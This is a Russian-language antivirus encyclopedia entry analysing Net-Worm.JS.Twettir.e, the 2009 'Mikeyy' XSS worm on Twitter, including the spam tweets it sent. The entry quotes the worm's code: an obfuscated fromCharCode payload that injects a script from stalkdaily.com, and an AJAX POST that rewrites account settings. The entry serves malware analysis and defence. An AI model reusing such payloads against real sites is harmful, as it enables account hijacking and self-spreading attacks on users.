Net-Worm.JS.Twettir.e

Главная / Описания / Net-Worm.JS.Twettir.e

Печать

Закладки

Время детектирования	14 апр 2009 05:57 MSK
Время выпуска обновления	14 апр 2009 10:01 MSK
Описание опубликовано	22 апр 2009 12:21 MSK

Технические детали

Net-Worm.JS.Twettir.e

Семейство XSS-червей, распространявшихся в социальной сети Twitter в апреле 2009 года. Для своего размножения использовали XSS-уязвимости и были созданы 17-и летним американцем Michael "Mikeyy" Mooney.

Червь использовал уязвимости в программном обеспечении Twitter, позволявшие производить атаки типа «межсайтовый скриптинг» (XSS) и модифицировать страницы учётных записей пользователей. Заражение происходило при посещении модифицированной страницы на сайте Twitter, или при переходе по гиперссылке в поддельном сообщении, присланном от имени участника Twitter. При этом исполнялся вредоносный сценарий JavaScript.

Основной функционал червей содержится в трех функциях:

XHConn – использует стандартную функцию XMLHttpRequest() для ajax-вызовов;
Urlencode – использует стандартную функцию encodeURIComponent() для кодировки URI;
Wait – содержит вредоносный функционал.

Рассылаемые сообщения:

"Twitter, freaking fix this already. >:[ - Mikeyy";
"Twitter, your community is going to be mad at you... - Mikeyy";
"This worm is getting out of hand Twitter. - Mikeyy";
"RT!! 4th gen #Mikeyy worm on the loose! Click here to protect
yourself: http://tinyurl.com/cojc6s";
"This is all Twitters fault! Don't blame Mikeyy!!";
"ALERT!! 4TH GEN MIKEYY WORM, USE NOSCRIPT:
http://bit.ly/4ywBID";
"How TO remove new Mikeyy worm! RT!! http://bit.ly/yCL1s";

В данном варианте у пользователей изменяется параметр user[name] :

var ajaxConn1 = new XHConn(); ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[name]="+xss+"&user[protected]=0&commit=Sa ve");

Значение изменяемого параметра вычисляется в следующем фрагменте:

var randomXSS=new Array();
randomXSS[0] = '"><title><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,3 2,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,115,116,97,108,107,10 0,97,105,108,121,46,99,111,109,47,97,106,97,120,46,106,115,34,62,60,47,115,99,11 4,105,112,116,62));</script>';
var genXSS = randomXSS[Math.floor(Math.random()*randomXSS.length)];
var xss = urlencode(genXSS);

Это приводит к добавлению к странице пользователя следующей ссылки на скрипт:

http://www.stalkdaily.com/ajax.js

Также червь изменяет параметры пользователя на следующие:

user[url]=Mikeyy+++++++++++++++++++++++++++++++++++++; user[profile_background_color]="+urlencode('##Mikeyy')+"

в результате чего у зараженного пользователя меняется имя аккаунта и фон его страницы.

Вредоносные программы

Вирусы и черви

Net-Worm

Вредоносная программа, обладающая способностью к несанкционированному пользователем саморазмножению в компьютерных сетях.

Отличительной особенностью данного типа червей является отсутствие необходимости в пользователе как в звене в цепочке распространения (т.е., непосредственно для активации вредоносной программы).

Зачастую при распространении такой червь ищет в сети компьютеры, на которых используется программное обеспечение, содержащее критические уязвимости. Для заражения уязвимых компьютеров червь посылает специально сформированный сетевой пакет (эксплойт), в результате чего код (или часть кода) червя проникает на компьютер-жертву и активируется. Если сетевой пакет содержит только часть кода червя, то после проникновения в уязвимый компьютер он скачивает основной файл червя и запускает его на исполнение.

Можно встретить сетевых червей данного типа, использующих сразу несколько эксплойтов для своего распространения, что увеличивает скорость нахождения ими компьютера-жертвы.

Другие модификации

Net-Worm.JS.Twettir.a

Net-Worm.JS.Twettir.b

Net-Worm.JS.Twettir.c

Net-Worm.JS.Twettir.d

Net-Worm.JS.Twettir.f

Net-Worm.JS.Twettir.g

Net-Worm.JS.Twettir.h